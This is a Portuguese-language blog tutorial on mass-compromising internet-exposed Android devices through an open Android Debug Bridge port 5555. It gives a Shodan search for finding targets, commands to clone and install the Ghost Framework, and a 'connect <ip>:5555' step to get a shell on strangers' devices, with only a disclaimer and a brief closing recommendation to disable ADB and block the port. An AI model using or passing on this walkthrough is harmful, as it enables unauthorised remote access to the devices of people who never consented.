Hackeando dispositivos Android em massa

Hackeando dispositivos Android em massa

Neste artigo iremos apresentar técnicas de como é possível obter acesso em dispositivos Android conectados à internet por meio do Android Debug Bridge (ADB).

Aviso: não nos responsabilizamos pelo mau uso das informações contidas neste artigo, o principal objetivo é a transmissão de conhecimento e a conscientização quanto aos problemas de segurança enfrentados na atualidade. 

Introdução

O Android Debug Bridge (ADB) é uma ferramenta versátil de linha de comando que permite a comunicação com um dispositivo. O comando ADB facilita uma variedade de ações do dispositivo como a instalação e depuração de aplicativos, e fornece acesso a um shell Unix que você pode usar para executar uma variedade de comandos em um dispositivo.

Ao realizar o acesso do dispositivo por meio do ADB é possível obter uma shell, ou seja, acesso via linha de comando semelhante ao acesso via telnet ou SSH. A única diferença entre a conexão ADB das demais é que não precisa de uma senha para realizar o seu acesso, o que é normal, pois o mesmo não pode ser acessado via Wi-Fi sem a configuração correta, somente via USB, que geralmente são utilizados por desenvolvedores.

No entanto, existe uma opção para abrir a porta 5555 para conectar-se ao dispositivo via Wi-Fi. É claro que os fabricantes estão habilitando esse recurso para fins de depuração, mas estão esquecendo de desabilitá-lo, deixando seu dispositivo aberto para hackers mal-intencionados.

Chega de enrolação e vamos ao que realmente interessa!

Nos passos a seguir, mostraremos o modelo de reconhecimento e captura de informações sobre os possíveis alvos. Após capturar essas informações vem a parte de exploração desses dispositivos.

Recon

Uma breve explicação sobre o Shodan: o Shodan é um mecanismo de pesquisa que permite ao usuário encontrar tipos específicos de computadores (webcams, roteadores, servidores etc.) conectados à Internet usando uma variedade de filtros.

Iremos utilizar o Shodan para encontrar esses dispositivos Android com a porta 5555 aberta:

Search: android debug bridge

Como resultado, temos diversos dispositivos publicados na internet com essa porta aberta. A maioria desses dispositivos podem ser encontrados na Ásia, Taiwan, Coréia e Brasil, sendo os locais mais afetados.

ADB

 Realizando o Ataque

Para realizar o processo de ataque, iremos utilizar o Ghost Framework que é utilizado para ataques de pós-exploração e com ele é possível obter acesso shell nesses dispositivos. O processo de exploração é relativamente simples.

Para configurar o ambiente, clone o repositório para o seu Kali Linux e siga os seguintes passos:

git clone https://github.com/entynetproject/ghost.git

Realizando a configuração e instalação do Ghost Framework:

cd ghost

chmod +x install.sh

./install.sh

Para iniciar a ferramenta após a instalação e configuração, basta somente digitar ghost em seu terminal:

Para acessar o dispositivo em específico basta digitar:

connect 0.0.0.0:5555

Realizando a conexão no alvo.

Para visualizar os demais comandos digite help após realizar a conexão no dispositivo.

ADB
ADB

Ao executar acesso shell ao dispositivo é possível realizar diversos comandos no mesmo.

ADB

 Conclusão

Chegamos ao final de mais um artigo.

Demonstramos no decorrer deste artigo a facilidade que um atacante tem para realizar o acesso indevido nos dispositivos Android (qualquer atacante com o conhecimento mínimo pode realizar esse tipo de ataque), o que torna ele ainda mais devastador.

Recomendações

O melhor conselho nesse momento é: proprietários de dispositivos Android verifiquem se o fornecedor deixou a interface do ADB ativada no dispositivo.

Para as operadoras de telefonia o recomendável é bloquear a conexão na porta 5555.

Fontes: https://www.wikipedia.org/
https://www.shodan.io/
https://github.com/entynetproject/ghost

About the Author

Deixe uma resposta